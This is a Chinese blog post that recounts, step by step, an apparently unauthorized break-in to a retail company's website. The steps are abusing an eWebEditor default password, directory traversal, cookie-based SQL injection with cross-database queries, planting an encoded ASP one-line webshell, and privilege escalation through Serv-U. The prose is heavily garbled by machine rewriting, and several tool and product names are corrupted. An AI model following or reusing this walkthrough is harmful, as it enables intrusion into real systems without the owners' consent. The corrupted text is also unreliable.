【渗透笔记】友情检测对象公司并夺回shell进度

一朋友在一个杂货店上班,由于无聊危险漫步就友情检查和测试了他们集团的网站,开端大家的检查和测试之旅吧。

图片 1

开拓网站,发现网站挺不错,不愧是大卖场,页面做的挺花,但是安全性怎样啊?来尝试啊。先用工具扫了下后台,结果什么也没扫到,再到页面上找找有没有注入漏洞,找了半天也没找到有效的事物,看来这几个站安全性不错,只可以旁注了,打开ip.wen.la,查一下这么些服务器上有多少个网站,发现服务器上还有另2个网站,打开一看,原来是她们公司的连锁超级市场的网站。来试试看那些网站呢。

用御剑扫一下敏感目录,居然发现了EWEBEDITOQX56,有了那东西,拿下这么些站就简单了,打开EWEBEDITOLacrosse的登陆页面。尝试用暗中认可密码登陆,成功登入。接下来打开样式管理,在图纸类型里添加ASA后缀。点击保存,可惜工作一而再不如人愿。提醒不能够立异。数据库或对象为只读,看来数据库棉被服装置为只读了,上传那条路就没戏了,通过刚才的扫描结果知道,这些EWEBEDITOMurano的版本是2.8,这几个版本还有三个历遍目录漏洞,点击上传文件管理,在地点前面加上&dir=..,就能够历遍上2个目录的文书了。

输入&dir=../../../..一向历遍到磁盘的根目录,能够见见四个网站目录都出来了。

接下去找找那个超级市场网站的数据库吧,发现数据库是在WEBDATA/DB.MDB,下载下来打开数据库,找到管理员密码,破解之后登陆后台。找了找后台,发现并未数据库备份,只找到了多个上传的地方。

各样上传漏洞轮番上阵,结果2个都非凡,只可以放弃这些网站,继续使用历遍目录漏洞来找找大家要检查和测试的杂货铺网站的数据库吧,发现数据库。

探望数据库ASA后缀就觉着不妙,果然打开一看,意料中的防下载安装。

不能够下载数据库,思路就到那了,休息一下,想了想,还得读出数据库密码才行,再看看那几个网站,确实找不到注入点,再看看超级市场网站,发现能够COOKIES注入,用老板KIES注入工具测试。

有超市网站的注入点,还知道百货公司网站的数据库地址,可以跨库查询,但是这几个数据库地址必须是相对路径。刚才在杂货店网站的后台看到了网站的绝对路径是D:\TEST\,那么百货网站的相对路径即是D:\xxx\,它的数据库相对路径正是D:\XXX\一dabasess\hdp7hm3jdxifq83zh6k523jk9_fh3e26s_f.asa,那样就能够跨库查询了,可是那些注入点是总老董KIES的注入点利用起来不太方便,大家把它转成GET型的注入点,打开老总KIE注入中间转播工具。

大家找到的注入点是超级市场.cordnewsview.asp?ld=632,组长KIE中转设置。设置好了,我们用AWS搭建三个简单易行的ASP环境,把刚生成的中间转播ASP文件放进去,在浏览器里拜访。

能够寻常访问,今后抄出NBSI注入吧,在ACCESS跨库那里写入百货公司网站的数据库绝对路径,成功博得了多少个管理员账号和密码。

可是悲剧的是捌个管理员账号只好破解出八个,而且那五个管理员账号登陆进后台还未曾后台权限,依然第③次遇上那种意况,运气背到家了。

后台进不去,思路到此地就断了,明明能够看出网站的兼具内容,可是正是拿不到WEBSHELL,这种感觉仿佛明明已经见到了屋子里放的鲜果,正是打不开门去拿。纵然很困难,然则也不用会轻言屏弃。过了一天,再来看那一个网站,觉得还得从列目录入手,看看网站还有哪些可使用的,果然,武术不负有心人,在杂货店这几个网站里又发现了3个GBOOK的目录,打开一看,是个留言模块,还有几个数据库。

在浏览器里打开数据库,呵呵,被分析了,役有防下载设置。

那下就差不多了,在数据Curry插马就能够得到WEBSHELL了,访问留言目录的后台,私下认可密码直接进去了。

能够在改动管理员资料那里插入一句话木马,那里的一句话木马须要加密一下预防被过滤掉。使用ANSI2UNCODE那些工具加密一句话。

我们使用的一句话木马为<%executerequest(“a”)%>a,在一句话前边加上a能够保证加密后的语句不出现问号,在协会者资料那里插入一句话木马点击保存。

再来访问数据库,能够见见提示类型差异盟,木马已经插入成功了。用一句话木马客户端连接,成功上传大家的小马。

小马拉马来西亚,成功上传马来亚,得到WEBSHELL。

接下去便是提权了,在WEBSHELL里发现了SEPAJEROV-U,提权就非常的粗略了,成功加了用户,然后登陆系统。

检查和测试到此甘休,危险漫步希望得以和大家在那边共同提升!  

相关文章